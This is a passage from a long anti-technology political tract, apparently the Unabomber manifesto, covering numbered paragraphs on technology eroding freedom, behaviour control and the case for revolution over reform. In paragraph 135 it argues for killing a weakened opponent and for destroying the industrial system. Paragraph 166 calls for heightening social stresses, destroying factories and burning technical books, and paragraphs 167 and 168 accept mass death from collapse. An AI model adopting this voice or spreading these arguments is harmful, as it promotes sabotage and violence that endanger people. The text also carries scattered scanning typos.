downstream, and the greenhouse effect affects the whole
world.

119. The system does not and cannot exist to satisfy
human needs. Instead, it is human behavior that has to be
modified to fit the needs of the system. This has nothing
to do with the political or social ideology that may
pretend to guide the technological system. It is the
fault of technology, because the system is guided not by
ideology but by technical necessity. [18] Of course the
system does satisfy many human needs, but generally
speaking it does this only to the extend that it is to
the advantage of the system to do it. It is the needs of
the system that are paramount, not those of the human
being. For example, the system provides people with food
because the system couldn't function if everyone starved;
it attends to people's psychological needs whenever it
can CONVENIENTLY do so, because it couldn't function if
too many people became depressed or rebellious. But the
system, for good, solid, practical reasons, must exert
constant pressure on people to mold their behavior to the
needs of the system. To much waste accumulating? The
government, the media, the educational system,
environmentalists, everyone inundates us with a mass of
propaganda about recycling. Need more technical
personnel? A chorus of voices exhorts kids to study
science. No one stops to ask whether it is inhumane to
force adolescents to spend the bulk of their time
studying subjects most of them hate. When skilled workers
are put out of a job by technical advances and have to
undergo "retraining," no one asks whether it is
humiliating for them to be pushed around in this way. It
is simply taken for granted that everyone must bow to
technical necessity. and for good reason: If human needs
were put before technical necessity there would be
economic problems, unemployment, shortages or worse. The
concept of "mental health" in our society is defined
largely by the extent to which an individual behaves in
accord with the needs of the system and does so without
showing signs of stress.

120. Efforts to make room for a sense of purpose and for
autonomy within the system are no better than a joke. For
example, one company, instead of having each of its
employees assemble only one section of a catalogue, had
each assemble a whole catalogue, and this was supposed to
give them a sense of purpose and achievement. Some
companies have tried to give their employees more
autonomy in their work, but for practical reasons this
usually can be done only to a very limited extent, and in
any case employees are never given autonomy as to
ultimate goals -- their "autonomous" efforts can never be
directed toward goals that they select personally, but
only toward their employer's goals, such as the survival
and growth of the company. Any company would soon go out
of business if it permitted its employees to act
otherwise. Similarly, in any enterprise within a
socialist system, workers must direct their efforts
toward the goals of the enterprise, otherwise the
enterprise will not serve its purpose as part of the
system. Once again, for purely technical reasons it is
not possible for most individuals or small groups to have
much autonomy in industrial society. Even the
small-business owner commonly has only limited autonomy.
Apart from the necessity of government regulation, he is
restricted by the fact that he must fit into the economic
system and conform to its requirements. For instance,
when someone develops a new technology, the small-
business person often has to use that technology whether
he wants to or not, in order to remain competitive.


THE 'BAD' PARTS OF TECHNOLOGY CANNOT BE SEPARATED FROM
THE 'GOOD' PARTS

121. A further reason why industrial society cannot be
reformed in favor of freedom is that modern technology is
a unified system in which all parts are dependent on one
another. You can't get rid of the "bad" parts of
technology and retain only the "good" parts. Take modern
medicine, for example. Progress in medical science
depends on progress in chemistry, physics, biology,
computer science and other fields. Advanced medical
treatments require expensive, high-tech equipment that
can be made available only by a technologically
progressive, economically rich society. Clearly you can't
have much Progress in medicine without the whole
technological system and everything that goes with it.

122. Even if medical progress could be maintained without
the rest of the technological system, it would by itself
bring certain evils. Suppose for example that a cure for
diabetes is discovered. People with a genetic tendency to
diabetes will then be able to survive and reproduce as
well as anyone else. Natural selection against genes for
diabetes will cease and such genes will spread throughout
the population. (This may be occurring to some extent
already, since diabetes, while not curable, can be
controlled through use of insulin.) The same thing will
happen with many other diseases susceptibility to which
is affected by genetic degradation of the population. The
only solution will be some sort of eugenics program or
extensive genetic engineering of human beings, so that
man in the future will no longer be a creation of nature,
or of chance, or of God (depending on your religious or
philosophical opinions), but a manufactured product.

123. If you think that big government interferes in your
life too much NOW, just wait till the government starts
regulating the genetic constitution of your children.
Such regulation will inevitably follow the introduction
of genetic engineering of human beings, because the
consequences of unregulated genetic engineering would be
disastrous. [19]

124. The usual response to such concerns is to talk about
"medical ethics." But a code of ethics would not serve to
protect freedom in the face of medical progress; it would
only make matters worse. A code of ethics applicable to
genetic engineering would be in effect a means of
regulating the genetic constitution of human beings.
Somebody (probably the upper-middle class, mostly) would
decide that such and such applications of genetic
engineering were "ethical". and others were not, so that
in effect they would be imposing their own values on the
genetic constitution of the population at large. Even if
a code of ethics were chosen on a completely democratic
basis, the majority would be imposing their own values on
any minorities who might have a different idea of what
constituted an "ethical" use of genetic engineering. The
only code of ethics that would truly protect freedom
would be one that prohibited ANY genetic engineering of
human beings, and you can be sure that no such code will
ever be applied in a technological society. No code that
reduced genetic engineering to a minor role could stand
up for long, because the temptation presented by the
immense power of biotechnology would be irresistible,
especially since to the majority of people many of its
applications will seem obviously and unequivocally good
(eliminating physical and mental diseases, giving people
the abilities they need to get along in today's world).
Inevitably, genetic engineering will be used extensively,
but only in ways consistent with the needs of the
industrial-technological system. [20]


TECHNOLOGY IS A MORE POWERFUL SOCIAL FORCE THAN THE
ASPIRATION FOR FREEDOOM

125. It is not possible to make a LASTING compromise
between technology and freedom, because technology is by
far the more powerful social force and continually
encroaches on freedom through REPEATED compromises.
Imagine the case of two neighbors, each of whom at the
outset owns the same amount of land, but one of whom is
more powerful than the other. The powerful one demands a
piece of the other's land. The weak one refuses. The
powerful one says, "OK, let's compromise. Give me half of
what I asked." The weak one has little choice but to give
in. Some time later the powerful neighbor demands another
piece of land, again there is a compromise, and so forth.
By forcing a long series of compromises on the weaker
man, the powerful one eventually gets all of his land. So
it goes in the conflict between technology and freedom.

126. Let us explain why technology is a more powerful
social force than the aspiration for freedom.

127. A technological advance that appears not to threaten
freedom often turns out to threaten it very seriously
later on. For example, consider motorized transport. A
walking man formerly could go where he pleased, go at his
own pace without observing any traffic regulations, and
was independent of technological support-systems. When
motor vehicles were introduced they appeared to increase
man's freedom. They took no freedom away from the walking
man, no one had to have an automobile if he didn't want
one, and anyone who did choose to buy an automobile could
travel much faster and farther than a walking man. But
the introduction of motorized transport soon changed
society in such a way as to restrict greatly man's
freedom of locomotion. When automobiles became numerous,
it became necessary to regulate their use extensively. In
a car, especially im densely populated areas, one cannot
just go where one likes at one's own pace one's movement
is governed by the flow of traffic and by various traffic
laws. One is tied down by various obligations: license
requirements, driver test, renewing registration,
insurance, maintenance required for safety, monthly
payments on purchase price. Moreover, the use of
motorized transport is no longer optional. Since the
introduction of motorized transport the arrangement of
our cities has changed in such a way that the majority of
people no longer live within walking distance of their
place of employment, shopping areas and recreational
opportunities, so that they HAVE TO depend on the
automobile for transportation. Or else they must use
public transportation, in which case they have even less
control over their own movement than when driving a car.
Even the walker's freedom is now greatly restricted. In
the city he continually has to stop to wait for traffic
lights that are designed mainly to serve auto traffic. In
the country, motor traffic makes it dangerous and
unpleasant to walk along the highway. (Note this
important point that we have just illustrated with the
case of motorized transport: When a new item of
technology is introduced as an option that an individual
can accept or not as he chooses, it does not necessarily
REMAIN optional. In many cases the new technology changes
society in such a way that people eventually find
themselves FORCED to use it.)

128. While technological progress AS A WHOLE continually
narrows our sphere of freedom, each new technical advance
CONSIDERED BY ITSELF appears to be desirable.
Electricity, indoor plumbing, rapid long-distance
communications ... how could one argue against any of
these things, or against any other of the innumerable
technical advances that have made modern society? It
would have been absurd to resist the introduction of the
telephone, for example. It offered many advantages and no
disadvantages. Yet, as we explained in paragraphs 59-76,
all these technical advances taken together have created
a world in which the average man's fate is no longer in
his own hands or in the hands of his neighbors and
friends, but in those of politicians, corporation
executives and remote, anonymous technicians and
bureaucrats whom he as an individual has no power to
influence. [21] The same process will continue in the
future. Take genetic engineering, for example. Few people
will resist the introduction of a genetic technique that
eliminates a hereditary disease. It does no apparent harm
and prevents.much suffering. Yet a large number of
genetic improvements taken together will make the human
being into an engineered product rather than a free
creation of chance (or of God, or whatever, depending on
your religious beliefs).

129. Another reason why technology is such a powerful
social force is that, within the context of a given
society, technological progress marches in only one
direction; it can never be reversed. Once a technical
innovation has been introduced, people usually become
dependent on it, so that they can never again do without
it, unless it is replaced by some still more advanced
innovation. Not only do people become dependent as
individuals on a new item of technology, but, even more,
the system as a whole becomes dependent on it. (Imagine
what would happen to the system today if computers, for
example, were eliminated.) Thus the system can move in
only one direction, toward greater technologization.
Technology repeatedly forces freedom to take a step back,
but technology can never take a step back -- short of the
overthrow of the whole technological system.

130. TechnoIogy advances with great rapidity and
threatens freedom at many different points at the same
time (crowding, rules and regulations, increasing
dependence of individuals on large organizations,
propaganda and other psychological techniques, genetic
engineering, invasion of privacy through surveillance
devices and computers, etc.). To hold back any ONE of the
threats to freedom would require a long and difficult
social struggle. Those who want to protect freedom are
overwhelmed by the sheer number of new attacks and the
rapidity with which they develop, hence they become
apathetic and no longer resist. To fight each of the
threats separately would be futile. Success can be hoped
for only by fighting the technological system as a whole;
but that is revolution, not reform.

131. Technicians (we use this term in its broad sense to
describe all those who perform a specialized task that
requires training) tend to be so involved in their work
(their surrogate activity) that when a conflict arises
between their technical work and freedom, they almost
always decide in favor of their technical work. This is
obvious in the case of scientists, but it also appears
elsewhere: Educators humanitarian groups, conservation
organizations do not hesitate to use propaganda or other
psychological techniques to help them achieve their
laudable ends. Corporations and government agencies, when
they find it useful, do not hesitate to collect
information about individuals without regard to their
privacy. Law enforcement agencies are frequently
inconvenienced by the constitutional rights of suspects
and often of completely innocent persons, and they do
whatever they can do legally (or sometimes illegally) to
restrict or circumvent those rights. Most of these
educators, government officials and law officers believe
in freedom, privacy and constitutional rights, but when
these conflict with their work, they usually feel that
their work is more important.

132. It is well known that people generally work better
and more persistently when striving for a reward than
when attempting to avoid a punishment or negative
outcome. Scientists and other technicians are motivated
mainly by the rewards they get through their work. But
those who oppose technological invasions of freedom are
working to avoid a negative outcome, consequently there
are few who work persistently and well at this
discouraging task. If reformers ever achieved a signal
victory that seemed to set up a solid barrier against
further erosion of freedom through technical progress,
most would tend to relax and turn their attention to more
agreeable pursuits. But the scientists would remain busy
in their laboratories, and technology as it progresses
would find ways, in spite of any barriers, to exert more
and more control over individuals and make them always
more dependent on the system.

133. No social arrangements, whether laws, institutions,
customs or ethical codes, can provide permanent
protection against technology. History shows that all
social arrangements are transitory; they all change or
break down eventually. But technological advances are
permanent within the context of a given civilization.
Suppose for example that it were possible to arrive at
some social arrangements that would prevent genetic
engineering from being applied to human beings, or
prevent it from being applied in such a way as to
threaten freedom and dignity. Still, the technology would
remain waiting. Sooner or later the social arrangement
would break down. Probably sooner, given the pace of
change in our society. Then genetic engineering would
begin to invade our sphere of freedom. and this invasion
would be irreversible (short of a breakdown of
technological civilization itself). Any illusions about
achieving anything permanent through social arrangements
should be dispelled by what is currently happening with
environmental legislation. A few years ago its seemed
that there were secure legal barriers preventing at least
SOME of the worst forms of environmental degradation. A
change in the political wind, and those barriers begin to
crumble.

134. For all of the foregoing reasons, technology is a
more powerful social force than the aspiration for
freedom. But this statement requires an important
qualification. It appears that during the next several
decades the industrial-technological system will be
undergoing severe stresses due to economic and
environmental problems, and especially due to problems of
human behavior (alienation, rebellion, hostility, a
variety of social and psychological difficulties). We
hope that the stresses through which the system is likely
to pass will cause it to break down, or at least will
weaken it sufficiently so that a revolution against it
becomes possible. If such a revolution occurs and is
successful, then at that particular moment the aspiration
for freedom will have proved more powerful than
technology.

135. In paragraph 125 we used an analogy of a weak
neighbor who is left destitute by a strong neighbor who
takes all his land by forcing on him a series of
compromises. But suppose now that the strong neighbor
gets sick, so tha he is unable to defend himself. The
weak neighbor can force the strong one to give him his
land back, or he can kill him. If he lets the strong man
survive and only forces him to give the land back, he is
a fool, because when the strong man gets well he will
again take all the land for himself. The only sensible
alternative for the weaker man is to kill the strong one
while he has the chance. In the same way, while the
industrial system is sick we must destroy it. If we
compromise with it and let it recover from its sickness,
it will eventually wipe out all of our freedom.


SIMPLER SOCIAL PROBLEMS HAVE PROVED INTRACTABLE

136. If anyone still imagines that it would be possible
to reform the system in such a way as to protect freedom
from technology, let him consider how clumsily and for
the most part unsuccessfully our society has dealt with
other social problems that are far more simple and
straighfforward. Among other things, the system has
failed to stop environmental degradation, political
corruption, drug trafficking or domestic abuse.

137. Take our environmental problems, for example. Here
the conflict of values is straightforward: economic
expedience now versus saving some of our natural
resources for our grandchildren. [22] But on this subject
we get only a lot of blather and obfuscation from the
people who have power, and nothing like a clear,
consistent line of action, and we keep on piling up
environmental problems that our grandchildren will have
to live with. Attempts to resolve the environmental issue
consist of struggles and compromises between different
factions, some of which are ascendant at one moment,
others at another moment. The line of struggle changes
with the shifting currents of public opinion. This is not
a rational process, nor is it one that is likely to lead
to a timely and successful solution to the problem. Major
social problems, if they get "solved" at all, are rarely
or never solved through any rational, comprehensive plan.
They just work themselves out through a process in which
various competing groups pursuing their own (usually
short-term) self-interest [23] arrive (mainly by luck) at
some more or less stable modus vivendi. In fact, the
principles we formulated in paragraphs 100-106 make it
seem doubtful that rational long-term social planning can
EVER be successful.

138. Thus it is clear that the human race has at best a
very limited capacity for solving even relatively
straightforward social problems. How then is it going to
solve the far more difficult and subtle problem of
reconciling freedom with technology? Technology presents
clear-cut material advantages, whereas freedom is an
abstraction that means different things to different
people. and its loss is easily obscured by propaganda and
fancy talk.

139. And note this important difference: It is
conceivable that our environmental problems (for example)
may some day be settled through a rational, comprehensive
plan, but if this happens it will be only because it is
in the longterm interest of the system to solve these
problems. But it is NOT in the interest of the system to
preserve freedom or small-group autonomy. On the
contrary, it is in the interest of the system to bring
human behavior under control to the greatest possible
extent. [24] Thus, while practical considerations may
eventually force the system to take a rational, prudent
approach to environmental problems, equally practical
considerations will force the system to regulate human
behavior ever more closely (preferably by indirect means
that will disguise the encroachment on freedom). This
isn't just our opinion. Eminent social scientists (e.g.
James Q. Wilson) have stressed the importance of
"socializing" people more effectively.


REVOLUTION IS EASIER THAN REFORM

140. We hope we have convinced the reader that the system
cannot be reformed in such a way as to reconcile freedom
with technology. The only way out is to dispense with the
industrialtechnological system altogether. This implies
revolution, not necessarily an armed uprising, but
certainly a radical and fundamental change in the nature
of society. 141. People tend to assume that because a
revolution involves a much greater change than reform
does, it is more difficult to bring about than reform is.
Actually, under certain circumstances revolution is much
easier than reform. The reason is that a revolutionary
movement can inspire an intensity of commitment that a
reform movement cannot inspire. A reform movement merely
offers to solve a particular social problem. A
revolutionary movement offers to solve all problems at
one stroke and create a whole new world; it provides the
kind of ideal for which people will take great risks and
make great sacrifices. For this reasons it would be much
easier to overthrow the whole technological system than
to put effective, permanent restraints on the development
or application of any one segment of technology, such as
genetic engineering, for example. Not many people will
devote themselves with single-minded passion to imposing
and maintaining restraints on genetic engineering, but
under suitable conditions large numbers of people may
devote themselves passionately to a revolution against
the industrial-technological system. As we noted in
paragraph 132, reformers seeking to limit certain aspects
of technology would be working to avoid a negative
outcome. But revolutionaries work to gain a powerful
reward -- fulfillment of their revolutionary vision and
therefore work harder and more persistently than
reformers do.

142. Reform is always restrained by the fear of painful
consequences if changes go too far. But once a
revolutionary fever has taken hold of a society, people
are willing to undergo unlimited hardships for the sake
of their revolution. This was clearly shown in the French
and Russian Revolutions. It may be that in such cases
only a minority of the population is really committed to
the revolution, but this minority is sufficiently large
and active so that it becomes the dominant force in
society. We will have more to say about revolution in
paragraphs 180-205.


CONTROL OF HUMAN BEHAVIOR

143. Since the beginning of civilization, organized
societies have had to put pressures on human beings of
the sake of the functioning of the social organism. The
kinds of pressures vary greatly from one society to
another. Some of the pressures are physical (poor diet,
excessive labor, environmental pollution), some are
psychological (noise, crowding, forcing human behavior
into the mold that society requires). In the past, human
nature has been approximately constant, or at any rate
has varied only within certain bounds. Consequently,
societies have been able to push people only up to
certain limits. When the limit of human endurance has
been passed, things start going wrong: rebellion, or
crime, or corruption, or evasion of work, or depression
and other mental problems, or an elevated death rate, or
a declining birth rate or something else, so that either
the society breaks down, or its functioning becomes too
inefficient and it is (quickly or gradually, through
conquest, attrition or evolution) replaced by some more
efficient form of society. [25]

144. Thus human nature has in the past put certain limits
on the development of societies. People could be pushed
only so far and no farther. But today this may be
changing, because modern technology is developing ways of
modifying human beings.

145. Imagine a society that subjects people to conditions
that make them terribly unhappy, then gives them drugs to
take away their unhappiness. Science fiction? It is
already happening to some extent in our own society. It
is well known that the rate of clinical depression has
been greatly increasing in recent decades. We believe
that this is due to disruption of the power process, as
explained in paragraphs 59-76. But even if we are wrong,
the increasing rate of depression is certainly the result
of SOME conditions that exist in today's society. Instead
of removing the conditions that make people depressed,
modern society gives them antidepressant drugs. In
effect, antidepressants are a means of modifying an
individual's internal state in such a way as to enable
him to tolerate social conditions that he would otherwise
find intolerable. (Yes, we know that depression is often
of purely genetic origin. We are referring here to those
cases in which environment plays the predominant role.)

146. Drugs that affect the mind are only one example of
the new methods of controlling human behavior that modern
society is developing. Let us look at some of the other
methods.

147. To start with, there are the techniques of
surveillance. Hidden video cameras are now used in most
stores and in many other places, computers are used to
collect and process vast amounts of information about
individuals. Information so obtained greatly increases
the effectiveness of physical coercion (i.e., law
enforcement). [26] Then there are the methods of
propaganda, for which the mass communication media
provide effective vehicles. Efflcient techniques have
been developed for winning elections, selling products,
influencing public opinion. The entertainment industry
serves as an important psychological tool of the system,
possibly even when it is dishing out large amounts of sex
and violence. Entertainment provides modern man with an
essential means of escape. While absorbed in television,
videos, etc., he can forget stress, anxiety, frustration,
dissatisfaction. Many primitive peoples, when they don't
have work to do, are quite content to sit for hours at a
time doing nothing at all, because they are at peace with
themselves and their world. But most modern people must
be constantly occupied or entertained, otherwise they get
"bored," i.e., they get fidgety, uneasy, irritable.

148. Other techniques strike deeper than the foregoing.
Education is no longer a simple affair of paddling a
kid's behind when he doesn't know his lessons and patting
him on the head when he does know them. It is becoming a
scientific technique for controlling the child's
development. Sylvan Learning Centers, for example, have
had great success in motivating children to study, and
psychological techniques are also used with more or less
success in many conventional schools. "Parenting"
techniques that are taught to parents are designed to
make children accept fundamental values of the system and
behave in ways that the system finds desirable. "Mental
health" programs, "intervention" techniques,
psychotherapy and so forth are ostensibly designed to
benefit individuals, but in practice they usually serve
as methods for inducing individuals to think and behave
as the system requires. (There is no contradiction here;
an individual whose attitudes or behavior bring him into
conflict with the system is up against a force that is
too powerful for him to conquer or escape from, hence he
is likely to suffer from stress, frustration, defeat. His
path will be much easier if he thinks and behaves as the
system requires. In that sense the system is acting for
the benefit of the individual when it brainwashes him
into conformity.) Child abuse in its gross and obvious
forms is disapproved in most if not all cultures.
Tormenting a child for a trivial reason or no reason at
all is something that appalls almost everyone. But many
psychologists interpret the concept of abuse much more
broadly. Is spanking, when used as part of a rational and
consistent system of discipline, a form of abuse? The
question will ultimately be decided by whether or not
spanking tends to produce behavior that makes a person
fit in well with the existing system of society. In
practice, the word "abuse" tends to be interpreted to
include any method of child-rearing that produces
behavior inconvenient for the system. Thus, when they go
beyond the prevention of obvious, senseless cruelty,
programs for preventing "child abuse" are directed toward
the control of human behavior on behalf of the system.

149. Presumably, research will continue to increase the
effectiveness of psychological techniques for controlling
human behavior. But we think it is unlikely that
psychological techniques alone will be sufficient to
adjust human beings to the kind of society that
technology is creating. Biological methods probably will
have to be used. We have already mentioned the use of
drugs in this connection. Neurology may provide other
avenues for modifying the human mind. Genetic engineering
of human beings is already beginning to occur in the form
of "gene therapy," and there is no reason to assume that
such methods will not eventually be used to modify those
aspects of the body that affect mental functioning.

150. As we mentioned in paragraph 134, industrial society
seems likely to be entering a period of severe stress,
due in part to problems of human behavior and in part to
economic and environmental problems. And a considerable
proportion of the system's economic and environmental
problems result from the way human beings behave.
Alienation, low self-esteem, depression, hostility,
rebellion; children who won't study, youth gangs, illegal
drug use, rape, child abuse, other crimes, unsafe sex,
teen pregnancy, population growth, political corruption,
race hatred, ethnic rivalry, bitter ideological conflict
(e.g., pro-choice vs. pro-life), political extremism,
terrorism, sabotage, anti-government groups, hate groups.
All these threaten the very survival of the system. The
system will therefore be FORCED to use every practical
means of controlling human behavior.

151. The social disruption that we see today is certainly
not the result of mere chance. It can only be a result of
the conditions of life that the system imposes on people.
(We have argued that the most important of these
conditions is disruption of the power process.) If the
systems succeeds in imposing sufficient control over
human behavior to assure its own survival, a new
watershed in human history will have been passed. Whereas
formerly the limits of human endurance have imposed
limits on the development of societies (as we explained
in Paragraphs 143, 144), industrial-technological society
will be able to pass those limits by modifying human
beings, whether by psychological methods or biological
methods or both. In the future, social systems will not
be adjusted to suit the needs of human beings. Instead,
human being will be adjusted to suit the needs of the
system. [27]

152. GeneraUy speaking, technological control over human
behavior will probably not be introduced with a
totalitarian intention or even through a conscious desire
to restrict human freedom. [28] Each new step in the
assertion of control over the human mind will be taken as
a rational response to a problem that faces society, such
as curing alcoholism, reducing the crime rate or inducing
young people to study science and engineering. In many
cases there will be a humanitarian justification. For
example, when a psychiatrist prescribes an
anti-depressant for a depressed patient, he is clearly
doing that individual a favor. It would be inhumane to
withhold the drug from someone who needs it. When Parents
send their children to Sylvan Learning Centers to have
them manipulated into becoming enthusiastic about their
studies, they do so from concern for their children's
welfare. It may be that some of these parents wish that
one didn't have to have specialized training to get a job
and that their kid didn't have to be brainwashed into
becoming a computer nerd. But what can they do? They
can't change society, and their child may be unemployable
if he doesn't have certain skills. So they send him to
Sylvan.

153. Thus control over human behavior will be introduced
not by a calculated decision of the authorities but
through a process of social evolution (RAPID evolution,
however). The process will be impossible to resist,
because each advance, considered by itself, will appear
to be beneficial, or at least the evil involved in making
the advance will appear to be beneficial, or at least the
evil involved in making the advance will seem to be less
than that which would result from not making it (see
paragraph 127). Propaganda for example is used for many
good purposes, such as discouraging child abuse or race
hatred. [14] Sex education is obviously useful, yet the
effect of sex education (to the extent that it is
successful) is to take the shaping of sexual attitudes
away from the family and put it into the hands of the
state as represented by the public school system.

154. Suppose a biological trait is discovered that
increases the likelihood that a child will grow up to be
a criminal, and suppose some sort of gene therapy can
remove this trait. [29] Of course most parents whose
children possess the trait will have them undergo the
therapy. It would be inhumane to do otherwise, since the
child would probably have a miserable life if he grew up
to be a criminal. But many or most primitive societies
have a low crime rate in comparison with that of our
society, even though they have neither high-tech methods
of child-rearing nor harsh systems of punishment. Since
there is no reason to suppose that more modern men than
primitive men have innate predatory tendencies, the high
crime rate of our society must be due to the pressures
that modern conditions put on people, to which many
cannot or will not adjust. Thus a treatment designed to
remove potential criminal tendencies is at least in part
a way of re-engineering people so that they suit the
requirements of the system.

155. Our society tends to regard as a "sickness" any mode
of thought or behavior that is inconvenient for the
system, and this is plausible because when an individual
doesn't fit into the system it causes pain to the
individual as well as problems for the system. Thus the
manipulation of an individual to adjust him to the system
is seen as a "cure" for a "sickness" and therefore as
good.

156. In paragraph 127 we pointed out that if the use of
a new item of technology is INITIALLY optional, it does
not necessarily REMAIN optional, because the new
technology tends to change society in such a way that it
becomes difficult or impossible for an individual to
function without using that technology. This applies also
to the technology of human behavior. In a world in which
most children are put through a program to make them
enthusiastic about studying, a parent will almost be
forced to put his kid through such a program, because if
he does not, then the kid will grow up to be,
comparatively speaking, an ignoramus and therefore
unemployable. Or suppose a biological treatment is
discovered that, without undesirable side-effects, will
greatly reduce the psychological stress from which so
many people suffer in our society. If large numbers of
people choose to undergo the treatment, then the general
level of stress in society will be reduced, so that it
will be possible for the system to increase the
stress-producing pressures. In fact, something like this
seems to have happened already with one of our society's
most important psychological tools for enabling people to
reduce (or at least temporarily escape from) stress,
namely, mass entertainment (see paragraph 147). Our use
of mass entertainment is "optional": No law requires us
to watch television, listen to the radio, read magazines.
Yet mass entertainment is a means of escape and
stress-reduction on which most of us have become
dependent. Everyone complains about the trashiness of
television, but almost everyone watches it. A few have
kicked the TV habit, but it would be a rare person who
could get along today without using ANY form of mass
entertainment. (Yet until quite recently in human histo}y
most people got along very nicely with no other
entertainment than that which each local community
created for itself.) Without the entertainment industry
the system probably would not have been able to get away
with putting as much stressproducing pressure on us as it
does.

157. Assuming that industrial society survives, it is
likely that technology will eventually acquire something
approaching complete control over human behavior. It has
been established beyond any rational doubt that human
thought and behavior have a largely biological basis. As
experimenters have demonstrated, feelings such as hunger,
pleasure, anger and fear can be turned on and off by
electrical stimulation of appropriate parts of the brain.
Memories can be destroyed by damaging parts of the brain
or they can be brought to the surface by electrical
stimulation. Hallucinations can be induced or moods
changed by drugs. There may or may not be an immaterial
human soul, but if there is one it clearly is less
powerful that the biological mechanisms of human
behavior. For if that were not the case then researchers
would not be able so easily to manipulate human feelings
and behavior with drugs and electrical currents.

158. It presumably would be impractical for all people to
have electrodes inserted in their heads so that they
could be controlled by the authorities. But the fact that
human thoughts and feelings are so open to biological
intervention shows that the problem of controlling human
behavior is mainly a technical problem; a problem of
neurons, hormones and complex molecules; the kind of
problem that is accessible to scientific attack. Given
the outstanding record of our society in solving
technical problems, it is overwhelmingly probable that
great advances will be made in the control of human
behavior.

159. Will public resistance prevent the introduction of
technological control of human behavior? It certainly
would if an attempt were made to introduce such control
all at once. But since technological control will be
introduced through a long sequence of small advances,
there will be no rational and effective public
resistance. (See paragraphs 127, 132, 153.)

160. To those who think that all this sounds like science
fiction, we point out that yesterday's science fiction is
today's fact. The Industrial Revolution has radically
altered man's environment and way of life, and it is only
to be expected that as technology is increasingly applied
to the human body and mind, man himself will be altered
as radically as his environment and way of life have
been.


HUMAN RACE AT A CROSSROADS

161. But we have gotten ahead of our story. It is one
thing to develop in the laboratory a series of
psychological or biological techniques for manipulating
human behavior and quite another to integrate these
techniques into a functioning social system. The latter
problem is the more difficult of the two. For example,
while the techniques of educational psychology doubtless
work quite well in the "lab schools" where they are
developed, it is not necessarily easy to apply them
effectively throughout our educational system. We all
know what many of our schools are like. The teachers are
too busy taking knives and guns away from the kids to
subject them to the latest techniques for making them
into computer nerds. Thus, in spite of all its technical
advances relating to human behavior, the system to date
has not been impressively successful in controlling human
beings. The people whose behavior is fairly well under
the control of the system are those of the type that
might be called "bourgeois." But there are growing
numbers of people who in one way or another are rebels
against the system: welfare leaches, youth gangs,
cultists. satanists, nazis, radical environmentalists,
militiamen, etc.

162. The system is currently engaged in a desperate
struggle to overcome certain problems that threaten its
survival, among which the problems of human behavior are
the most important. If the system succeeds in acquiring
sufficient control over human behavior quickly enough, it
will probably survive. Otherwise it will break down. We
think the issue will most likely be resolved within the
next several decades, say 40 to 100 years.

163. Suppose the system survives the crisis of the next
several decades. By that time it will have to have
solved, or at least brought under control, the principal
problems that confront it, in particular that of
"socializing" human beings; that is, making people
sufficiently docile so that heir behavior no longer
threatens the system. That being accomplished, it does
not appear that there would be any further obstacle to
the development of technology, and it would presumably
advance toward its logical conclusion, which is complete
control over everything on Earth, including human beings
and all other important organisms. The system may become
a unitary, monolithic organization, or it may be more or
less fragmented and consist of a number of organizations
coexisting in a relationship that includes elements of
both cooperation and competition, just as today the
government, the corporations and other large
organizations both cooperate and compete with one
another. Human freedom mostly will have vanished, because
individuals and small groups will be impotent vis-a-vis
large organizations armed with supertechnology and an
arsenal of advanced psychological and biological tools
for manipulating human beings, besides instruments of
surveillance and physical coercion. Only a small number
of people will have any real power, and even these
probably will have only very limited freedom, because
their behavior too will be regulated; just as today our
politicians and corporation executives can retain their
positions of power only as long as their behavior remains
within certain fairly narrow limits.

164. Don't imagine that the systems will stop developing
further techniques for controlling human beings and
nature once the crisis of the next few decades is over
and increasing control is no longer necessary for the
system's survival. On the contrary, once the hard times
are over the system will increase its control over people
and nature more rapidly, because it will no longer be
hampered by difficulties of the kind that it is currently
experiencing. Survival is not the principal motive for
extending control. As we explained in paragraphs 87-90,
technicians and scientists carry on their work largely as
a surrogate activity; that is, they satisfy their need
for power by solving technical problems. They will
continue to do this with unabated enthusiasm, and among
the most interesting and challenging problems for them to
solve will be those of understanding the human body and
mind and intervening in their development. For the "good
of humanity," of course.

165. But suppose on the other hand that the stresses of
the coming decades prove to be too much for the system.
If the system breaks down there may be a period of chaos,
a "time of troubles" such as those that history has
recorded at various epochs in the past. It is impossible
to predict what would emerge from such a time of
troubles, but at any rate the human race would be given
a new chance. The greatest danger is that industrial
society may begin to reconstitute itself within the first
few years after the breakdown. Certainly there will be
many people (power-hungry types espeeially) who will be
anxious to get the factories running again.

166. Therefore two tasks confront those who hate the
servitude to which the industrial system is reducing the
human race. First, we must work to heighten the social
stresses within the system so as to increase the
likelihood that it will break down or be weakened
sufficiently so that a revolution against it becomes
possible. Second, it is necessary to develop and
propagate an ideology that opposes technology and the
industrial society if and when the system becomes
sufficiently weakened. And such an ideology will help to
assure that, if and when industrial society breaks down,
its remnants will be smashed beyond repair, so that the
system cannot be reconstituted. The factories should be
destroyed, technical books burned, etc.


HUMAN SUFFERING

167. The industrial system will not break down purely as
a result of revolutionary action. It will not be
vulnerable to revolutionary attack unless its own
internal problems of development lead it into very
serious difficulties. So if the system breaks down it
will do so either spontaneously, or through a process
that is in part spontaneous but helped along by
revolutionaries. If the breakdown is sudden, many people
will die, since the world's population has become so
overMown that it cannot even feed itself any longer
without advanced technology. Even if the breakdown is
gradual enough so that reduction of the population can
occur more through lowering of the birth rate than
through elevation of the death rate, the process of
de-industrialization probably will be very chaotic and
involve much suffering. It is naive to think it likely
that technology can be phased out in a smoothly managed,
orderly way, especially since the technophiles will fight
stubbornly at every step. Is it therefore cruel to work
for the breakdown of the system? Maybe, but maybe not. In
the first place, revolutionaries will not be able to
break the system down unless it is already in enough
trouble so that there would be a good chance of its
eventually breaking down by itself anyway; and the bigger
the system grows, the more disastrous the consequences of
its breakdown will be; so it may be that revolutionaries,
by hastening the onset of the breakdown, will be reducing
the extent of the disaster.

168. In the second place, one has to balance struggle and
death against the loss of freedom and dignity. To many of
us, freedom and dignity are more important than a long
life or avoidance of physical pain. Besides, we all have
to die some time, and it may be better to die fighting
for survival, or for a cause, than to live a long but
empty and purposeless life.

169. In the third place, it is not at all certain that
survival of the system will lead to less suffering than
breakdown of the system would. The system has already
caused, and is continuing to cause, immense suffering all
over the world. Ancient cultures, that for hundreds of
years gave people a satisfactory relationship with each
other and with their environment, have been shattered by
contact with industrial society, and the result has been
a whole catalogue of economic, environmental, social and
psychological problems. One of the effects of the
intrusion of industrial society has been that over much
of the world traditional controls on population have been
thrown out of balance. Hence the population explosion,
with all that that implies. Then there is the
psychological suffering that is widespread throughout the
supposedly fortunate countries of the West (see
paragraphs 44, 45). No one knows what will happen as a
result of ozone depletion, the greenhouse effect and
